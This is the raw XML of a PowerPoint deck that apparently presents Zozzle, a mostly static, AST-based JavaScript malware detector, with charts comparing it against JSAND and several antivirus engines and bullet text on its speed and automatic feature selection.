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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="357" r:id="rId3"/>
    <p:sldId id="360" r:id="rId4"/>
    <p:sldId id="361" r:id="rId5"/>
    <p:sldId id="374" r:id="rId6"/>
    <p:sldId id="379" r:id="rId7"/>
    <p:sldId id="376" r:id="rId8"/>
    <p:sldId id="381" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="378" r:id="rId11"/>
    <p:sldId id="364" r:id="rId12"/>
    <p:sldId id="346" r:id="rId13"/>
    <p:sldId id="368" r:id="rId14"/>
    <p:sldId id="386" r:id="rId15"/>
    <p:sldId id="362" r:id="rId16"/>
    <p:sldId id="369" r:id="rId17"/>
    <p:sldId id="318" r:id="rId18"/>
    <p:sldId id="410" r:id="rId19"/>
    <p:sldId id="407" r:id="rId20"/>
    <p:sldId id="408" r:id="rId21"/>
    <p:sldId id="334" r:id="rId22"/>
    <p:sldId id="336" r:id="rId23"/>
    <p:sldId id="411" r:id="rId24"/>
    <p:sldId id="412" r:id="rId25"/>
    <p:sldId id="404" r:id="rId26"/>
    <p:sldId id="340" r:id="rId27"/>
    <p:sldId id="409" r:id="rId28"/>
    <p:sldId id="413" r:id="rId29"/>
    <p:sldId id="40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2BCAC47-CF05-43AB-B3BF-D53E2B98C546}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="357"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="374"/>
            <p14:sldId id="379"/>
            <p14:sldId id="376"/>
            <p14:sldId id="381"/>
            <p14:sldId id="338"/>
            <p14:sldId id="378"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Zozzle" id="{2FA832C0-9A48-4926-9996-687FD6A18F3B}">
          <p14:sldIdLst>
            <p14:sldId id="364"/>
            <p14:sldId id="346"/>
            <p14:sldId id="368"/>
            <p14:sldId id="386"/>
            <p14:sldId id="362"/>
            <p14:sldId id="369"/>
            <p14:sldId id="318"/>
            <p14:sldId id="410"/>
            <p14:sldId id="407"/>
            <p14:sldId id="408"/>
            <p14:sldId id="334"/>
            <p14:sldId id="336"/>
            <p14:sldId id="411"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Evaluation" id="{3597DFE7-78EA-4AED-B724-F68DF73C4787}">
          <p14:sldIdLst>
            <p14:sldId id="412"/>
            <p14:sldId id="404"/>
            <p14:sldId id="340"/>
            <p14:sldId id="409"/>
            <p14:sldId id="413"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Conclusions" id="{1B08A128-B548-4DA2-901B-54E1FC1ED8E6}">
          <p14:sldIdLst>
            <p14:sldId id="40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0066FF"/>
    <a:srgbClr val="A50021"/>
    <a:srgbClr val="FFFF99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1" autoAdjust="0"/>
    <p:restoredTop sz="99455" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="-570" y="-3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5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17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ev\RozzleSD\rozzle\Presentation\zozzle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Sheet1!$A$1:$F$1</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Zozzle</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>AV1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>AV2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>AV3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>AV4</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>AV5</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$2:$F$2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052096"/>
        <c:axId val="92066176"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="92052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2066176"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="92066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920520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Sheet1!$A$18:$G$18</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>Zozzle</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>JSAND</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>AV1</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>AV2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>AV3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>AV4</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>AV5</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$A$19:$G$19</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>0.09</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.15</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.24</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.28000000000000003</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.83</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.42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492160"/>
        <c:axId val="92493696"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="924921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2493696"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="92493696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crossAx val="924921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cat>
            <c:numRef>
              <c:f>foo!$B$2:$B$30</c:f>
              <c:numCache>
                <c:formatCode>m/d/yyyy</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>40695</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>40696</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>40697</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>40698</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>40699</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>40700</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>40701</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>40702</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>40703</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>40704</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>40705</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>40706</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>40707</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>40708</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>40709</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>40710</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>40711</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>40712</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>40713</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>40714</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>40715</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>40716</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>40717</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>40718</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>40719</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>40720</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>40721</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>40722</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>40723</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>foo!$A$2:$A$30</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="29"/>
                <c:pt idx="0">
                  <c:v>5276</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4801</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4747</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4833</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5298</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>4486</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>3121</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6429</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5548</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5164</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5578</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4927</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>5295</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>352</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5604</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>8639</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>8611</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>6612</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6025</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6390</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6177</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>5683</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6095</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6098</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>6061</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>6428</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>6326</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>6261</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3078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189440"/>
        <c:axId val="92190976"/>
      </c:barChart>
      <c:dateAx>
        <c:axId val="9218944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92190976"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblOffset val="100"/>
        <c:baseTimeUnit val="days"/>
      </c:dateAx>
      <c:valAx>
        <c:axId val="92190976"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1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9218944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3F0D2A-D612-4C22-9696-15D6BD1BE1F8}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/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7741114-64FB-43EA-8B16-3CDCB1EF3C1E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
            <a:t>Mostly static malware detection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2153E081-4C24-4404-A4B6-14B83234BE73}" type="sibTrans" cxnId="{9D39936D-2A59-4FF9-AA57-B3BA0C06AB3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{663F3B9C-4127-4ED2-82F3-8380ECAEE8CB}" type="parTrans" cxnId="{9D39936D-2A59-4FF9-AA57-B3BA0C06AB3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75F61226-055B-4B0B-88E8-E3FE328E6A2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Based on extensive experience of analyzing 1000s of malware sites from Nozzle runtime detector</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC3C4816-AD4F-4A96-A49D-60AFA57D6878}" type="sibTrans" cxnId="{3DB7D70F-D58B-4CC5-BA72-75E0677870E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00CB2C24-E929-4FC8-9EF1-7548B52A6DBD}" type="parTrans" cxnId="{3DB7D70F-D58B-4CC5-BA72-75E0677870E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4D92DDB-3804-410C-97F3-4C2997DC98C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Zozzle, a highly precise, lightweight, mostly static JavaScript malware detector</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C3AB259-40FF-4FB9-B340-B045AC48B934}" type="sibTrans" cxnId="{D21A09A8-E875-466E-B635-BCBA042AE3B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7620FF7A-51FD-442A-BD9D-6F605C5BCA11}" type="parTrans" cxnId="{D21A09A8-E875-466E-B635-BCBA042AE3B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7D83335-BF7D-4193-BC86-7DCAFD40DDA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD8B4B04-E8CE-48B6-B350-6AD10EA5B564}" type="parTrans" cxnId="{876B84CC-48C7-4F34-A38D-B72EA0C933DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{267305A5-2E64-4611-9D93-985F86F5F1FD}" type="sibTrans" cxnId="{876B84CC-48C7-4F34-A38D-B72EA0C933DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" type="pres">
      <dgm:prSet presAssocID="{9B3F0D2A-D612-4C22-9696-15D6BD1BE1F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7BC57E-D939-4D34-8784-E6F2F3287A55}" type="pres">
      <dgm:prSet presAssocID="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAE03124-41EA-4922-BC2C-9DB8EDBAB9FE}" type="pres">
      <dgm:prSet presAssocID="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E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8149831E-0CC5-4317-879F-9A33CDC579A9}" type="pres">
      <dgm:prSet presAssocID="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="13470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F92812-F49D-4A0C-B5F0-1E8B6E24C526}" type="pres">
      <dgm:prSet presAssocID="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88C}" type="pres">
      <dgm:prSet presAssocID="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E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74F213-57DA-4987-A533-7BDF65EDFA1E}" type="presOf" srcId="{E7D83335-BF7D-4193-BC86-7DCAFD40DDA0}" destId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{35A0191C-0E00-406F-9CF5-B86BDBEB06CB}" type="presOf" srcId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" destId="{EAE03124-41EA-4922-BC2C-9DB8EDBAB9FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3DB7D70F-D58B-4CC5-BA72-75E0677870E0}" srcId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" destId="{75F61226-055B-4B0B-88E8-E3FE328E6A2D}" srcOrd="2" destOrd="0" parTransId="{00CB2C24-E929-4FC8-9EF1-7548B52A6DBD}" sibTransId="{DC3C4816-AD4F-4A96-A49D-60AFA57D6878}"/>
    <dgm:cxn modelId="{D21A09A8-E875-466E-B635-BCBA042AE3B2}" srcId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" destId="{D4D92DDB-3804-410C-97F3-4C2997DC98C5}" srcOrd="0" destOrd="0" parTransId="{7620FF7A-51FD-442A-BD9D-6F605C5BCA11}" sibTransId="{3C3AB259-40FF-4FB9-B340-B045AC48B934}"/>
    <dgm:cxn modelId="{876B84CC-48C7-4F34-A38D-B72EA0C933DA}" srcId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" destId="{E7D83335-BF7D-4193-BC86-7DCAFD40DDA0}" srcOrd="1" destOrd="0" parTransId="{AD8B4B04-E8CE-48B6-B350-6AD10EA5B564}" sibTransId="{267305A5-2E64-4611-9D93-985F86F5F1FD}"/>
    <dgm:cxn modelId="{B5E1EDE0-B4AD-46CE-8D06-FABFE5A4261A}" type="presOf" srcId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" destId="{8149831E-0CC5-4317-879F-9A33CDC579A9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D0472902-8B66-4879-9232-359D3F648738}" type="presOf" srcId="{9B3F0D2A-D612-4C22-9696-15D6BD1BE1F8}" destId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C5BBC222-BF69-458B-A15F-6AEEBB9AB7DD}" type="presOf" srcId="{D4D92DDB-3804-410C-97F3-4C2997DC98C5}" destId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9D39936D-2A59-4FF9-AA57-B3BA0C06AB3F}" srcId="{9B3F0D2A-D612-4C22-9696-15D6BD1BE1F8}" destId="{37741114-64FB-43EA-8B16-3CDCB1EF3C1E}" srcOrd="0" destOrd="0" parTransId="{663F3B9C-4127-4ED2-82F3-8380ECAEE8CB}" sibTransId="{2153E081-4C24-4404-A4B6-14B83234BE73}"/>
    <dgm:cxn modelId="{DF74A857-BE1E-47EC-9E2D-AE4171636513}" type="presOf" srcId="{75F61226-055B-4B0B-88E8-E3FE328E6A2D}" destId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88C}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8BE95EF1-CD3A-4E7C-B6B8-3F1E44713B2A}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6A249C4B-406B-4981-953C-050F0986CB20}" type="presParOf" srcId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" destId="{EAE03124-41EA-4922-BC2C-9DB8EDBAB9FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F9A39AA4-75B2-4E11-93C7-D7C0E26E7722}" type="presParOf" srcId="{9A7BC57E-D939-4D34-8784-E6F2F3287A55}" destId="{8149831E-0CC5-4317-879F-9A33CDC579A9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{12691DBB-72AC-4344-8808-A9FABCFF4EFA}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{CEF92812-F49D-4A0C-B5F0-1E8B6E24C526}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B38584A4-3FEB-4EA0-9A2C-99801A1725DF}" type="presParOf" srcId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" destId="{ED81C2A6-4CF5-4BAF-8D63-C6C6BC2AC88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3F0D2A-D612-4C22-9696-15D6BD1BE1F8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9A31CCB-BB63-47EE-ACE6-22A076F4A997}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
            <a:t>AST-based detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5329607-9213-4C15-B5A3-32F317D3AA20}" type="parTrans" cxnId="{3ACBBE0F-A3E1-49EC-A04F-1D056F2C660F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED210729-0598-4CC3-AD99-660BC0E8E018}" type="sibTrans" cxnId="{3ACBBE0F-A3E1-49EC-A04F-1D056F2C660F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8D5FDBF-2944-4B7B-A895-1284F8EE5F0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>AST-based detection leads to better precision </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3A4A166-8A08-4279-B9A4-1560A8AAF8BC}" type="parTrans" cxnId="{0FD81427-5851-4CF0-8D74-9D6E5EEC3E93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52799D8E-2E47-4181-AD3F-CF9CEB8B7577}" type="sibTrans" cxnId="{0FD81427-5851-4CF0-8D74-9D6E5EEC3E93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E700411D-2B0B-4751-8A1D-E6A5E60279F0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
            <a:t>Fast classiﬁcation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28027FEA-96B0-4DC1-A974-C4E0060B53AF}" type="parTrans" cxnId="{C2BE2B5D-2A2E-4E76-94ED-77380D3D650C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A60AF619-425D-44F2-9C9A-2914C85836C5}" type="sibTrans" cxnId="{C2BE2B5D-2A2E-4E76-94ED-77380D3D650C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B40BF837-8369-48F6-BDA8-658DFA6A48E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Scale to hundreds or even thousands of features</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B1BC95-26D1-4F84-8154-ACCFEFF32D89}" type="parTrans" cxnId="{9EBAA1EA-4448-4C21-AD57-4F585C09E634}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F513B62B-DAC0-413B-9E3E-D5D376824F2E}" type="sibTrans" cxnId="{9EBAA1EA-4448-4C21-AD57-4F585C09E634}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2145A3AD-AEF3-4EA8-86C7-29659081F075}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Feature selection is totally automatic</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58ED7EDA-A4A4-4ABB-BE3A-CE2C85DAADF4}" type="parTrans" cxnId="{43D46D02-AADE-4145-BEE1-8A3E7F69C991}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E5054F-25D8-4A58-B566-663D2BF077BA}" type="sibTrans" cxnId="{43D46D02-AADE-4145-BEE1-8A3E7F69C991}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B9FF0CB-526D-48DB-9D6E-3635CFB64D01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>1 MB of code/sec</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63F8C114-7144-4C00-9277-44EDFE35FD24}" type="parTrans" cxnId="{4923E1A8-CD54-4971-A031-7D2E6CD6D2D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76A0C064-A5EF-4736-83DB-D41E78CCC214}" type="sibTrans" cxnId="{4923E1A8-CD54-4971-A031-7D2E6CD6D2D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{156D6958-CA0C-4771-8995-A8FD54E2611B}" type="pres">
